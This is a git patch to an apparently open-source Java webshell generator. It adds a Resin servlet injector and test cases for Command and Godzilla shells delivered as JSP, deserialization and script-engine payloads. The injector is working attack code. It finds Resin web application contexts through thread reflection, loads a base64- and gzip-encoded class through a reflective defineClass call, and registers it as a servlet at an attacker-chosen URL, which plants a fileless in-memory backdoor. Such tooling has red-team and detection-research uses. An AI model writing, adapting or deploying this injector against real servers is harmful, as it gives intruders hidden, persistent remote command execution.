From 0d690495066c9ab739a6911e127656ebf4e1bf78 Mon Sep 17 00:00:00 2001 From: ReaJason Date: Sat, 21 Dec 2024 14:45:09 +0800 Subject: [PATCH] feat: support resin servlet (#2) --- .../reajason/javaweb/memshell/ResinShell.java | 15 +- .../resin/Resin3116ContainerTest.java | 6 + .../resin/Resin318ContainerTest.java | 4 + .../resin/Resin4058ContainerTest.java | 6 + .../resin/Resin4067ContainerTest.java | 10 +- .../resin/injector/ResinServletInjector.java | 194 ++++++++++++++++++ 6 files changed, 232 insertions(+), 3 deletions(-) create mode 100644 memshell/src/main/java/com/reajason/javaweb/memshell/resin/injector/ResinServletInjector.java diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/ResinShell.java b/generator/src/main/java/com/reajason/javaweb/memshell/ResinShell.java index 2da3ac99..c1187232 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/ResinShell.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/ResinShell.java @@ -6,8 +6,11 @@ import com.reajason.javaweb.memshell.resin.command.CommandListener; import com.reajason.javaweb.memshell.resin.godzilla.GodzillaListener; import com.reajason.javaweb.memshell.resin.injector.ResinFilterInjector; import com.reajason.javaweb.memshell.resin.injector.ResinListenerInjector; +import com.reajason.javaweb.memshell.resin.injector.ResinServletInjector; import com.reajason.javaweb.memshell.shelltool.command.CommandFilter; +import com.reajason.javaweb.memshell.shelltool.command.CommandServlet; import com.reajason.javaweb.memshell.shelltool.godzilla.GodzillaFilter; +import com.reajason.javaweb.memshell.shelltool.godzilla.GodzillaServlet; import org.apache.commons.lang3.tuple.Pair; import java.util.List; @@ -26,16 +29,24 @@ public class ResinShell extends AbstractShell { @Override protected Map, Class>> getCommandShellMap() { return Map.of( + Constants.SERVLET, Pair.of(CommandServlet.class, ResinServletInjector.class), + Constants.JAKARTA_SERVLET, Pair.of(CommandServlet.class, ResinServletInjector.class), Constants.FILTER, Pair.of(CommandFilter.class, ResinFilterInjector.class), - Constants.LISTENER, Pair.of(CommandListener.class, ResinListenerInjector.class) + Constants.JAKARTA_FILTER, Pair.of(CommandFilter.class, ResinFilterInjector.class), + Constants.LISTENER, Pair.of(CommandListener.class, ResinListenerInjector.class), + Constants.JAKARTA_LISTENER, Pair.of(CommandListener.class, ResinListenerInjector.class) ); } @Override protected Map, Class>> getGodzillaShellMap() { return Map.of( + Constants.SERVLET, Pair.of(GodzillaServlet.class, ResinServletInjector.class), + Constants.JAKARTA_SERVLET, Pair.of(GodzillaServlet.class, ResinServletInjector.class), Constants.FILTER, Pair.of(GodzillaFilter.class, ResinFilterInjector.class), - Constants.LISTENER, Pair.of(GodzillaListener.class, ResinListenerInjector.class) + Constants.JAKARTA_FILTER, Pair.of(GodzillaFilter.class, ResinFilterInjector.class), + Constants.LISTENER, Pair.of(GodzillaListener.class, ResinListenerInjector.class), + Constants.JAKARTA_LISTENER, Pair.of(GodzillaListener.class, ResinListenerInjector.class) ); } } diff --git a/integration-test/src/test/java/com/reajason/javaweb/integration/resin/Resin3116ContainerTest.java b/integration-test/src/test/java/com/reajason/javaweb/integration/resin/Resin3116ContainerTest.java index fe570754..a9e993cf 100644 --- a/integration-test/src/test/java/com/reajason/javaweb/integration/resin/Resin3116ContainerTest.java +++ b/integration-test/src/test/java/com/reajason/javaweb/integration/resin/Resin3116ContainerTest.java @@ -40,6 +40,12 @@ public class Resin3116ContainerTest { static Stream casesProvider() { return Stream.of( + arguments(imageName, Constants.SERVLET, ShellTool.Godzilla, Packer.INSTANCE.JSP), + arguments(imageName, Constants.SERVLET, ShellTool.Godzilla, Packer.INSTANCE.Deserialize), + arguments(imageName, Constants.SERVLET, ShellTool.Godzilla, Packer.INSTANCE.ScriptEngine), + arguments(imageName, Constants.SERVLET, ShellTool.Command, Packer.INSTANCE.JSP), + arguments(imageName, Constants.SERVLET, ShellTool.Command, Packer.INSTANCE.Deserialize), + arguments(imageName, Constants.SERVLET, ShellTool.Command, Packer.INSTANCE.ScriptEngine), arguments(imageName, Constants.FILTER, ShellTool.Godzilla, Packer.INSTANCE.JSP), arguments(imageName, Constants.FILTER, ShellTool.Godzilla, Packer.INSTANCE.Deserialize), arguments(imageName, Constants.FILTER, ShellTool.Godzilla, Packer.INSTANCE.ScriptEngine), diff --git a/integration-test/src/test/java/com/reajason/javaweb/integration/resin/Resin318ContainerTest.java b/integration-test/src/test/java/com/reajason/javaweb/integration/resin/Resin318ContainerTest.java index fc42474e..507f97cd 100644 --- a/integration-test/src/test/java/com/reajason/javaweb/integration/resin/Resin318ContainerTest.java +++ b/integration-test/src/test/java/com/reajason/javaweb/integration/resin/Resin318ContainerTest.java @@ -40,6 +40,10 @@ public class Resin318ContainerTest { static Stream casesProvider() { return Stream.of( + arguments(imageName, Constants.SERVLET, ShellTool.Godzilla, Packer.INSTANCE.JSP), + arguments(imageName, Constants.SERVLET, ShellTool.Godzilla, Packer.INSTANCE.Deserialize), + arguments(imageName, Constants.SERVLET, ShellTool.Command, Packer.INSTANCE.JSP), + arguments(imageName, Constants.SERVLET, ShellTool.Command, Packer.INSTANCE.Deserialize), arguments(imageName, Constants.FILTER, ShellTool.Godzilla, Packer.INSTANCE.JSP), arguments(imageName, Constants.FILTER, ShellTool.Godzilla, Packer.INSTANCE.Deserialize), arguments(imageName, Constants.FILTER, ShellTool.Command, Packer.INSTANCE.JSP), diff --git a/integration-test/src/test/java/com/reajason/javaweb/integration/resin/Resin4058ContainerTest.java b/integration-test/src/test/java/com/reajason/javaweb/integration/resin/Resin4058ContainerTest.java index 4fbf2e9b..ff4b0f64 100644 --- a/integration-test/src/test/java/com/reajason/javaweb/integration/resin/Resin4058ContainerTest.java +++ b/integration-test/src/test/java/com/reajason/javaweb/integration/resin/Resin4058ContainerTest.java @@ -40,6 +40,12 @@ public class Resin4058ContainerTest { static Stream casesProvider() { return Stream.of( + arguments(imageName, Constants.SERVLET, ShellTool.Godzilla, Packer.INSTANCE.JSP), + arguments(imageName, Constants.SERVLET, ShellTool.Godzilla, Packer.INSTANCE.Deserialize), + arguments(imageName, Constants.SERVLET, ShellTool.Godzilla, Packer.INSTANCE.ScriptEngine), + arguments(imageName, Constants.SERVLET, ShellTool.Command, Packer.INSTANCE.JSP), + arguments(imageName, Constants.SERVLET, ShellTool.Command, Packer.INSTANCE.Deserialize), + arguments(imageName, Constants.SERVLET, ShellTool.Command, Packer.INSTANCE.ScriptEngine), arguments(imageName, Constants.FILTER, ShellTool.Godzilla, Packer.INSTANCE.JSP), arguments(imageName, Constants.FILTER, ShellTool.Godzilla, Packer.INSTANCE.Deserialize), arguments(imageName, Constants.FILTER, ShellTool.Godzilla, Packer.INSTANCE.ScriptEngine), diff --git a/integration-test/src/test/java/com/reajason/javaweb/integration/resin/Resin4067ContainerTest.java b/integration-test/src/test/java/com/reajason/javaweb/integration/resin/Resin4067ContainerTest.java index 119f928c..a49ae6e4 100644 --- a/integration-test/src/test/java/com/reajason/javaweb/integration/resin/Resin4067ContainerTest.java +++ b/integration-test/src/test/java/com/reajason/javaweb/integration/resin/Resin4067ContainerTest.java @@ -40,10 +40,18 @@ public class Resin4067ContainerTest { static Stream casesProvider() { return Stream.of( + arguments(imageName, Constants.SERVLET, ShellTool.Godzilla, Packer.INSTANCE.JSP), + arguments(imageName, Constants.SERVLET, ShellTool.Godzilla, Packer.INSTANCE.Deserialize), + arguments(imageName, Constants.SERVLET, ShellTool.Command, Packer.INSTANCE.JSP), + arguments(imageName, Constants.SERVLET, ShellTool.Command, Packer.INSTANCE.Deserialize), arguments(imageName, Constants.FILTER, ShellTool.Godzilla, Packer.INSTANCE.JSP), + arguments(imageName, Constants.FILTER, ShellTool.Godzilla, Packer.INSTANCE.Deserialize), arguments(imageName, Constants.FILTER, ShellTool.Command, Packer.INSTANCE.JSP), + arguments(imageName, Constants.FILTER, ShellTool.Command, Packer.INSTANCE.Deserialize), arguments(imageName, Constants.LISTENER, ShellTool.Godzilla, Packer.INSTANCE.JSP), - arguments(imageName, Constants.LISTENER, ShellTool.Command, Packer.INSTANCE.JSP) + arguments(imageName, Constants.LISTENER, ShellTool.Godzilla, Packer.INSTANCE.Deserialize), + arguments(imageName, Constants.LISTENER, ShellTool.Command, Packer.INSTANCE.JSP), + arguments(imageName, Constants.LISTENER, ShellTool.Command, Packer.INSTANCE.Deserialize) ); } diff --git a/memshell/src/main/java/com/reajason/javaweb/memshell/resin/injector/ResinServletInjector.java b/memshell/src/main/java/com/reajason/javaweb/memshell/resin/injector/ResinServletInjector.java new file mode 100644 index 00000000..2f24a494 --- /dev/null +++ b/memshell/src/main/java/com/reajason/javaweb/memshell/resin/injector/ResinServletInjector.java @@ -0,0 +1,194 @@ +package com.reajason.javaweb.memshell.resin.injector; + +import java.io.ByteArrayInputStream; +import java.io.ByteArrayOutputStream; +import java.io.IOException; +import java.lang.reflect.Field; +import java.lang.reflect.Method; +import java.util.*; +import java.util.zip.GZIPInputStream; + +/** + * @author ReaJason + * @since 2024/12/21 + */ +public class ResinServletInjector { + + static { + new ResinServletInjector(); + } + + public ResinServletInjector() { + try { + List contexts = getContext(); + for (Object context : contexts) { + Object servlet = getShell(context); + inject(context, servlet); + } + } catch (Exception e) { + e.printStackTrace(); + } + } + + public String getUrlPattern() { + return "{{urlPattern}}"; + } + + public String getClassName() { + return "{{className}}"; + } + + public String getBase64String() throws IOException { + return "{{base64Str}}"; + } + + public List getContext() throws Exception { + Set contexts = new HashSet(); + Thread[] threads = (Thread[]) invokeMethod(Thread.class, "getThreads", new Class[0], new Object[0]); + for (Thread thread : threads) { + Class servletInvocationClass = null; + try { + servletInvocationClass = thread.getContextClassLoader().loadClass("com.caucho.server.dispatch.ServletInvocation"); + } catch (Exception e) { + continue; + } + if (servletInvocationClass != null) { + Object contextRequest = servletInvocationClass.getMethod("getContextRequest").invoke(null); + Object webApp = invokeMethod(contextRequest, "getWebApp", new Class[0], new Object[0]); + if (webApp != null) { + contexts.add(webApp); + } + } + } + return Arrays.asList(contexts.toArray()); + } + + @SuppressWarnings("all") + private Object getShell(Object context) throws Exception { + Object obj; + ClassLoader classLoader = Thread.currentThread().getContextClassLoader(); + if (classLoader == null) { + classLoader = context.getClass().getClassLoader(); + } + try { + obj = classLoader.loadClass(getClassName()).newInstance(); + } catch (Exception e) { + byte[] clazzByte = gzipDecompress(decodeBase64(getBase64String())); + Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); + defineClass.setAccessible(true); + Class clazz = (Class) defineClass.invoke(classLoader, clazzByte, 0, clazzByte.length); + obj = clazz.newInstance(); + } + return obj; + } + + private void inject(Object context, Object servlet) throws Exception { + if (isInjected(context)) { + System.out.println("servlet already injected"); + return; + } + Class servletMappingClass; + try { + servletMappingClass = Thread.currentThread().getContextClassLoader().loadClass("com.caucho.server.dispatch.ServletMapping"); + } catch (Exception e) { + servletMappingClass = context.getClass().getClassLoader().loadClass("com.caucho.server.dispatch.ServletMapping"); + } + Object servletMapping = servletMappingClass.newInstance(); + invokeMethod(servletMapping, "setServletName", new Class[]{String.class}, new Object[]{getClassName()}); + invokeMethod(servletMapping, "setServletClass", new Class[]{String.class}, new Object[]{getClassName()}); + invokeMethod(servletMapping, "addURLPattern", new Class[]{String.class}, new Object[]{getUrlPattern()}); + invokeMethod(context, "addServletMapping", new Class[]{servletMappingClass}, new Object[]{servletMapping}); + System.out.println("servlet injected success"); + } + + @SuppressWarnings("all") + public boolean isInjected(Object context) throws Exception { + Map servlets = (Map) getFieldValue(getFieldValue(context, "_servletManager"), "_servlets"); + for (String key : servlets.keySet()) { + if (key.contains(getClassName())) { + return true; + } + } + return false; + } + + @SuppressWarnings("all") + public static byte[] decodeBase64(String base64Str) throws Exception { + Class decoderClass; + try { + decoderClass = Class.forName("java.util.Base64"); + Object decoder = decoderClass.getMethod("getDecoder").invoke(null); + return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, base64Str); + } catch (Exception ignored) { + decoderClass = Class.forName("sun.misc.BASE64Decoder"); + return (byte[]) decoderClass.getMethod("decodeBuffer", String.class).invoke(decoderClass.newInstance(), base64Str); + } + } + + @SuppressWarnings("all") + public static byte[] gzipDecompress(byte[] compressedData) throws IOException { + ByteArrayOutputStream out = new ByteArrayOutputStream(); + GZIPInputStream gzipInputStream = null; + + try { + gzipInputStream = new GZIPInputStream(new ByteArrayInputStream(compressedData)); + byte[] buffer = new byte[4096]; + int n; + while ((n = gzipInputStream.read(buffer)) > 0) { + out.write(buffer, 0, n); + } + } finally { + if (gzipInputStream != null) { + try { + gzipInputStream.close(); + } catch (IOException ignored) { + } + } + out.close(); + } + return out.toByteArray(); + } + + @SuppressWarnings("all") + public static Object getFieldValue(Object obj, String name) throws NoSuchFieldException, IllegalAccessException { + for (Class clazz = obj.getClass(); + clazz != Object.class; + clazz = clazz.getSuperclass()) { + try { + Field field = clazz.getDeclaredField(name); + field.setAccessible(true); + return field.get(obj); + } catch (NoSuchFieldException ignored) { + + } + } + throw new NoSuchFieldException(name); + } + + @SuppressWarnings("all") + public static Object invokeMethod(Object obj, String methodName, Class[] paramClazz, Object[] param) { + try { + Class clazz = (obj instanceof Class) ? (Class) obj : obj.getClass(); + Method method = null; + while (clazz != null && method == null) { + try { + if (paramClazz == null) { + method = clazz.getDeclaredMethod(methodName); + } else { + method = clazz.getDeclaredMethod(methodName, paramClazz); + } + } catch (NoSuchMethodException e) { + clazz = clazz.getSuperclass(); + } + } + if (method == null) { + throw new NoSuchMethodException("Method not found: " + methodName); + } + + method.setAccessible(true); + return method.invoke(obj instanceof Class ? null : obj, param); + } catch (Exception e) { + throw new RuntimeException("Error invoking method: " + methodName, e); + } + } +}